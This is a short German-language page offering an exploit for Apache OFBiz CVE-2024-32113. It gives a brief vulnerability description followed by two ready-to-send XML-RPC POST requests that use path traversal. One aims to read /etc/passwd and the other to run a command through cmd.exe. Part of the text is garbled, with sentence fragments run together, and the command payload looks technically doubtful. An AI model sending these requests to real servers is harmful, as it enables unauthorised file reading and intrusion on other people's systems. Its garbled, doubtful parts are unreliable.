
Exploit für Apache OFBiz CVE-2024-32113 – Path Traversal über manipulierte XML-RPC-Anfragen, der beliebiges Lesen von Dateien und potenzielle Befehlsausführung auf verwundbaren Servern ermöglicht.
Eine als kritisch eingestufte Schwachstelle wurde in Apache OFBiz bis Version 18.12.12 gefunden. Betroffen von diesem Problem ist eine unbekannte Funktionalität. Die Manipulation mit einer unbekannten Eingabe führt zu einer Path-Traversal-Schwachstelle. Das Produkt verwendet externe Eingaben, um einen Pfadnamen zu erstellen, der eine Datei oder ein Verzeichnis identifizieren soll, das sich unterhalb eines eingeschränkten übergeordneten Verzeichnisses befindet, aber das Produkt neutralisiert spezielle Elemente innerhalb des Pfadnamens nicht ordnungsgemäß, was dazu führen kann, dass der Pfadname auf einen Speicherort außerhalb des eingeschränkten Verzeichnisses aufgelöst wird. Betroffen sind Vertraulichkeit, Integrität und Verfügbarkeit.
../../../../../../etc/passwd, um auf die Datei etc/passwd auf dem Apache-OFBiz-Server zu verweisen.etc/passwd zu lesen, die sensible Informationen über die Benutzer auf dem Server enthält.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>